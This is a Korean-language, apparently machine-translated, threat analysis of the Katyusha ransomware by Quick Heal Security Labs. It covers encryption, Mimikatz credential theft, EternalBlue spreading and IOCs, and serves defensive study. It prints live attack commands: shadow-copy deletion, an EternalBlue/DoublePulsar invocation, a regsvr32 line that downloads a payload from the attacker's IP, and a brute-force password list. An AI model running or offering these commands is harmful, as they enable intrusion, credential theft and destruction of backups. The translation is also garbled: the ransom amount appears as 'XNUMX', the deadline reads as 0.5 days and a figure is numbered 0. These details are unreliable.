Quick Heal Security Labs는 몇 달 동안 랜섬웨어가 증가하는 것을 관찰해 왔습니다. 파일을 암호화하고 ".katyusha" 확장자를 추가한 후 0.5일 이내에 XNUMXBTC를 요구하고, 몸값을 지불하지 않으면 데이터를 공개하겠다고 위협하는 또 다른 흥미로운 랜섬웨어를 발견했습니다. 이 랜섬웨어는 "더블 펄서"및"영원한 푸른색네트워크 전체에 확산되는 데 사용되는 익스플로잇입니다. 또한 "스퀴블리두네트워크 전체로 확산될 수 있습니다. 이 랜섬웨어의 감염 경로는 아직 확인되지 않았지만, 출처를 기반으로 볼 때 이 랜섬웨어는 스피어 피싱, 멀버타이징, 스팸 메일, SMB 익스플로잇 등을 통해 시스템에 침투할 가능성이 있습니다.
기술 분석:
이 맬웨어는 MPRESS(v2.19)에 포함되어 있으며 피해자 시스템에 "라는 이름으로 존재합니다.카츄샤.exe"%temp%"에 있습니다. 여기에는 세 가지 구성 요소가 포함되어 있습니다. 실행 시 이 구성 요소를 C:\Windows\Temp에 저장하고 실행을 시작합니다.
- Svchost0.bat
- Zkts.exe
- Ktsi.exe
카츄샤는 시스템이 이미 감염되었는지 확인하기 위해 시스템에서 다음 파일을 검사합니다.
“C:\_how_to_decrypt_you_files.txt”
“C:\ProgramData\_how_to_decrypt_you_files.txt”
시스템이 이미 감염된 경우, Katyusha는 그림 0과 같이 자체 복제본을 삭제하고 자신을 종료하는 코드가 포함된 배치 파일(svchost1.bat)을 생성합니다. 시스템이 감염되지 않은 경우, zkts.exe와 ktsi.exe를 삭제하고 실행합니다.
Zkts.exe:
이 파일은 7zip으로 압축된 실행 파일이며 네트워크 확산 모듈, 비밀번호 도용 모듈 등 여러 하위 모듈을 포함하는 주요 구성 요소입니다.
zkts.exe를 실행하면 "C : \ Windows \ Temp”Mimikatz, katyusha.dll, eternal blue exploit 등이 있습니다. 이러한 DLL 파일은 나중에 Katyusha에서 활동을 수행하는 데 사용됩니다.
Ktsi.exe (암호화기):
이 파일 역시 MPRESS로 압축된 파일인 주요 구성 요소입니다. 주로 파일 암호화 및 피해자 시스템에 랜섬웨어 메시지를 유포하는 데 사용됩니다. 이 프로세스는 그림 3과 같이 메인 페이로드(katyusha.exe)에 의해 독립적으로 시작됩니다.
ktsi.exe를 실행하면 먼저 그림 4에 표시된 대로 암호화를 위해 관련 프로세스에 의해 잠긴 파일(예: db 파일 등)의 핸들을 해제하기 위해 다음 작업 목록을 종료합니다.
데이터베이스 관련 파일을 성공적으로 암호화하기 위해 ktsi는 데이터베이스 애플리케이션과 관련된 프로세스를 종료합니다. 아래는 맬웨어에 하드코딩된 프로세스 목록입니다.
| mysqld.exe | httpd.exe | sqlsevr.exe |
| sqlwriter.exe | w3wp.exe | sqlagent.exe |
| fdhost.exe | fdlauncher.exe | 보고서비스서비스.exe |
| omtsreco.exe | tnslsnr.exe | 오라클.exe |
| emagent.exe | mysqld-nt.exe |
taskkill 작업 후 맬웨어는 아래 경로에 html 및 txt 형식의 랜섬 노트를 삭제하여 시스템 시작 시 모든 사용자가 볼 수 있도록 합니다.
“C:\ProgramData\Microsoft\Windows\시작 메뉴\프로그램\시작프로그램”
_파일_복호화_방법.txt
_파일_복호화_방법.html
"C:\ProgramData"와 C 드라이브 루트(C:\)에 "_how_to_decrypt_you_files.txt"라는 이름의 랜섬웨어 메모만 저장합니다.
Ktsi.exe는 다음 명령을 실행하여 섀도 복사본도 삭제합니다.
"vssadmin delete shadows /all /quiet"
이러한 모든 작업이 끝나면 ktsi.exe는 표준 암호화 방법을 사용하여 파일 암호화(RSA)를 시작합니다. 크립토감스이 알고리즘과 관련된 서명은 그림 7에 표시된 것처럼 파일에서 찾을 수 있습니다.
다음 파일을 제외한 모든 확장자 파일을 암호화합니다.
또한, 그림 9와 같이 파일 및 폴더 제외 목록이 포함되어 있으며, 열거된 파일 경로에서 해당 단어가 발견되면 해당 경로를 암호화 대상에서 제외합니다. 중단 없는 암호화를 위해 목록에는 몇 가지 보안 제품의 이름이 포함되어 있습니다.
확산 메커니즘:
네트워크 확산을 위해 zkts에서 추출된 파일이 사용됩니다. 추출된 구성 요소는 그림 2를 참조하십시오.
m32.exe와 m64.exe는 Windows lsass.exe에서 자격 증명을 가져오는 데 사용되는 Mimikatz 도구입니다.
첫째, katyusha.exe는 IsWow64Process 시스템 호출을 사용하여 시스템이 32비트인지 64비트인지 판별합니다(시스템이 64비트이면 XNUMX이 아닌 값을 반환함). 그리고 시스템 아키텍처에 따라 Mimikatz를 실행합니다.
Mimikatz 도구는 다음 파일을 삭제합니다. “C:\Windows\Temp” 출력으로.
– snamelog : 가져온 사용자 이름이 들어 있습니다.
– spasslog : 가져온 각 사용자 이름에 대한 비밀번호가 포함되어 있습니다.
mimikatz를 실행한 후, katyusha.exe는 snamelog에서 사용자 이름을, spasslog에서 비밀번호를 읽어 네트워크에 대한 무차별 대입 공격을 수행합니다.
Zkts.exe는 또한 svchostb.exe, svchostb.xml, svchostbs.exe, svchostbs.xml, katyusha.dll 및 svchostp.exe를 삭제합니다. 이러한 구성 요소는 네트워크를 통해 Katyusha를 확산하는 데 사용됩니다.
이터널 블루 익스플로잇과 더블 펄서를 이용하여, 악성코드는 네트워크로 연결된 시스템에서 katyusha.dll을 순차적으로 실행합니다. 이 katyusha.exe는 다음 명령을 사용하여 SMB 취약점을 악용합니다.
“C:\windows\temp\&svchostb.exe –TargetIp & svchostbs.exe –OutConfig s –TargetPort 445 –Protocol SMB –Architecture x64 –Function RunDLL –DllPayload katyusha.dll –TargetIp ”
Katyusha.dll은 다음 명령을 실행하는 코드를 포함하는 페이로드 파일입니다.
"regsvr32 /u /s /i:hxxp://86.106.102.147/img/katyusha.data scrobj.dll"
그림 12에서 볼 수 있듯이 파일에서 하드코딩된 명령 문자열을 찾을 수도 있습니다.
위의 regsvr32(Microsoft Register Server) 명령을 실행하면 주어진 URL에서 스크립트(katyusha.data)를 다운로드하고 regsvr32 매개변수(/u)를 사용하여 등록 해제 서버를 호출합니다. 이렇게 하면 다음 위치에서 자바스크립트 코드가 실행됩니다. 그림 13에 표시된 것처럼 다운로드한 스크립틀릿의 태그입니다. 스크립트에는 주어진 URL에서 katyusha.exe를 다운로드하는 코드가 포함되어 있습니다. "% 온도 %" 디렉토리로 이동하여 실행합니다.
C&C에서 스크립틀릿을 다운로드하고 실행하기 위해 regsvr32 명령을 사용하는 이러한 공격을 다음과 같이 지칭합니다. “스퀴블리두”.
위의 작업 후, Power Admin Tool(svchostp.exe)을 사용하여 네트워크의 시스템에 무차별 대입 공격을 가합니다. 이 도구는 Sysinternals와 유사합니다. PsExec의 원격 시스템에서 프로세스를 실행하는 데 사용되는 도구입니다. 이 랜섬웨어는 아래와 같이 몇 가지 사용자 이름과 비밀번호 목록을 가지고 있으며, Mimikatz가 가져온 사용자 이름과 비밀번호(snamelog 및 spasslog)를 무차별 대입 공격에 사용합니다.
사용자 이름:
관리자, 관리자, +snamelog의 콘텐츠.
암호:
관리자, 12345, chinachina203, 111, 123456, qwerty, 테스트, abc123, 12345678, 0000, 1122, 1234, +spasslog의 내용.
무차별 대입에서 Katyusha는 다음 명령을 사용합니다.
“C:\Windows\temp\svchostp.exe -유 -피 -n 10 -s regsvr32 /u /s /i:https://86.106.102.147/img/katyusha.data scrobj.dll”
위의 명령은 매개변수로 url을 사용하여 regsvr32 유틸리티를 실행하여 페이로드를 다운로드하고 katyusha.dll에 대해 위에서 설명한 작업을 수행합니다.
IOC:
MD5 : 7f87db33980c0099739de40d1b725500
URL:
- hxxp://86.106.102.147/img/katyusha.data
- hxxp://86.106.102.147/img/katyusha.exe
비트코인 지갑 주소: “3ALmvAWLEothnMF5BjckAFaKB5S6zan9PK”
맺음말:
올해 랜섬웨어가 급증했습니다. 랜섬웨어는 새로운 유포 수법을 사용하고 데이터를 암호화하고 있습니다. 현재 대부분의 랜섬웨어는 네트워크를 통해 유포되기 위해 Eternal Blue, Mimikatz와 같은 익스플로잇과 도구를 사용합니다. 사용자 여러분께서는 의심스러운 URL/이메일에 접근하지 마시고, 강력한 시스템 자격 증명을 사용하고, 백신 프로그램을 최신 상태로 유지하시기 바랍니다.
주제 전문가:
프라틱 파치포르 | 퀵힐 보안 랩스
